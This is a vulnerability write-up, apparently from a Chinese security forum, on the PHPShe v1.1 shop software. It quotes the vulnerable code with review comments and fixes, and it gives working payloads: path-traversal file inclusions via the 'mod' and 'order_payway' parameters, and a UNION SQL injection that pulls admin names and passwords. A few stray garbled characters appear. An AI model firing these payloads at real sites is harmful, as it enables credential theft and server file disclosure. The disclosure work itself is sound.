phpshe v1.1多处SQL注入和文件包含漏洞Getshell

/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By     : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0x00 整体大概参数传输
//common.php
// Request "auto-globals": every key of $_GET / $_POST / $_SESSION / $_COOKIE is
// copied into a variable with a source prefix ($_g_*, $_p_*, $_s_*, $_c_*).
// The only processing on the way in is pe_trim() (presumably whitespace trimming —
// its body is not shown) plus pe_stripslashes() when magic_quotes is on. There is
// no SQL escaping and no type or path validation here, so every $_g_* / $_p_* /
// $_c_* variable read downstream is still raw client input and must be validated
// at the point of use.
// get_magic_quotes_gpc() was removed in PHP 8.0; this is PHP 5-era code.
if (get_magic_quotes_gpc()) {
    !empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
    !empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
    !empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
// Cookies are always passed through pe_stripslashes(), independent of the branch above.
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
0x01 包含漏洞
//首页文件
<?php
// index.php front controller. (The forum rendered "<?php" as "<!--?php" and "->"
// as "--->"; both are restored here, nothing else is changed.)
include('common.php');
$cache_category = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class = cache::get('class');
$cache_ad = cache::get('ad');
$cache_link = cache::get('link');
$cache_page = cache::get('page');
// $cache_setting is not defined in this excerpt — presumably populated by common.php.
$web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array();
// NOTE(review): $_c_cart_list is the client's cart_list cookie (common.php extract()s
// $_COOKIE with only pe_trim()/pe_stripslashes()) and is unserialize()d here, twice.
// Deserialising client-controlled data is the classic PHP object-injection sink;
// whether it is exploitable depends on which classes are loaded at this point —
// worth confirming, and json_encode/json_decode is the safe replacement either way.
$cart_num = pe_login('user') ? $db->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
// $mod is taken verbatim from the request (see the routing block in common.php) and
// spliced into the include path with no whitelist against the files that actually
// exist under module/{$module}/ — the "limited" (鸡肋) local file inclusion the author
// describes. Checking $mod against a fixed list of known module names closes it.
include("{$pe['path_root']}module/{$module}/{$mod}.php");
pe_result();
?>
//common 文件 第15行开始
url路由配置
// URL routing: $module, $mod and $act default to 'index'; $mod, $act and $id are
// then taken from POST, falling back to GET, falling back to the default.
// The values are used verbatim — no whitelist, no normalisation — and $mod later
// becomes a segment of an include() path in index.php, which is what makes the
// path traversal below possible. Two smaller points visible here: the truthiness
// tests treat a literal "0" as "not supplied", and $id is never initialised on the
// first line, so its final fallback reads an undefined variable unless something
// earlier in common.php set it (not shown in this excerpt).
$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
" R, l, o. N- J/ _//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
0x02 搜索注入
<code id="code2">

//product.php文件
case 'list':
    // Product listing for a category (the enclosing switch and this case's break are
    // outside the excerpt).
    $category_id = intval($id);
    $info = $db->pe_select('category', array('category_id'=>$category_id));
    // Search: the WHERE / ORDER BY tail of the product query is assembled as a raw
    // string and handed to pe_selectall() as-is.
    $sqlwhere = " and `product_state` = 1";
    pe_lead('hook/category.hook.php');
    if ($category_id) {
        // NOTE(review): the variable name on the next line is truncated in the paste;
        // from the surrounding lines it is almost certainly `$sqlwhere .=`.
        where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
    }
    // $_g_keyword is the raw ?keyword= parameter (common.php extract()s $_GET with
    // only pe_trim()) and is interpolated into the LIKE pattern with no escaping —
    // the SQL injection this write-up demonstrates. Judging by the author's payload,
    // nothing further down the pe_selectall() path escapes it either, so the fix
    // belongs here: bind the value, or at minimum escape it and the LIKE wildcards.
    $_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'";
    // $_g_orderby is split on '_' and both halves are interpolated the same way
    // (column name inside backticks, direction bare). Same pattern, same exposure —
    // both halves should be checked against a fixed list of allowed columns/directions.
    if ($_g_orderby) {
        $orderby = explode('_', $_g_orderby);
        $sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
    }
    else {
        $sqlwhere .= " order by `product_id` desc";
    }
    // array(16, $_g_page) is presumably (rows per page, page number) — confirm against sql_selectall().
    $info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
    // Hot-seller ranking
    $product_hotlist = product_hotlist();
    // Current category path
    $nowpath = category_path($category_id);
    $seo = pe_seo($info['category_name']);
    include(pe_tpl('product_list.html'));
//跟进selectall函数库
/**
 * Run "select {$field} from `dbpre{$table}` {$sqlwhere}" and return all rows.
 *
 * @param string       $table      table name without the dbpre prefix; interpolated as-is
 * @param string|array $where      condition; passed through $this->_dowhere() and then
 *                                 interpolated as-is. Callers on this page pass either a
 *                                 raw string tail (" and ... order by ...") or an array
 *                                 of column => value pairs.
 * @param string       $field      column list; interpolated as-is
 * @param array        $limit_page forwarded to sql_selectall() (callers pass array(16, $_g_page))
 *
 * Nothing visible in this method escapes or binds its inputs, and what _dowhere()
 * does to a string versus an array is not shown. Any caller that lets request data
 * reach $where, $field or $table is therefore building an injectable query; a
 * bound-parameter API (values bound, column names whitelisted) is the proper fix,
 * escaping at each call site the minimum.
 */
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    // Build the WHERE tail from $where.
    $sqlwhere = $this->_dowhere($where);
    return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}
//exp
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
</code>

0x03 包含漏洞2
<code id="code3">

//order.php

case 'pay':
    // Payment step for an unpaid order (the enclosing switch is outside the excerpt).
    // pe_dbhold() presumably escapes for SQL — its body is not shown; confirm.
    $order_id = pe_dbhold($_g_id);
    // Load the configured payment gateways. Note that $cache_payway is decoded here
    // but its keys are never used to validate the gateway the client submits below.
    $cache_payway = cache::get('payway');
    foreach($cache_payway as $k => $v) {
        $cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
        if ($k == 'bank') {
            $cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
        }
    }
    $order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
    !$order['order_id'] && pe_error('订单号错误...');
    if (isset($_p_pesubmit)) {
        // $_p_info is the whole POSTed info[] array (common.php extract()s $_POST with
        // the _p prefix) and is handed to pe_update() as the column/value map. Unless
        // pe_update() filters keys (not shown), the client decides which columns of
        // `order` are written and to what — a mass-assignment problem on its own.
        // At minimum the accepted keys should be whitelisted here before the update.
        if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
            $info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
            foreach ($info_list as $v) {
                $order['order_name'] .= "{$v['product_name']};";
            }
            echo '正在为您连接支付网站,请稍后...';
            // The client-supplied order_payway becomes a path segment with no check
            // against the gateways known in $cache_payway — the "limited" (鸡肋) local
            // file inclusion the author describes once the order update has gone through.
            // Guarding with isset($cache_payway[$_p_info['order_payway']]) before the
            // include is the obvious fix.
            include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
        }
        else {
            pe_error('支付错误...');
        }
    }
    $seo = pe_seo('选择支付方式');
    include(pe_tpl('order_pay.html'));
    break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>$ e# x) S  m# b) s
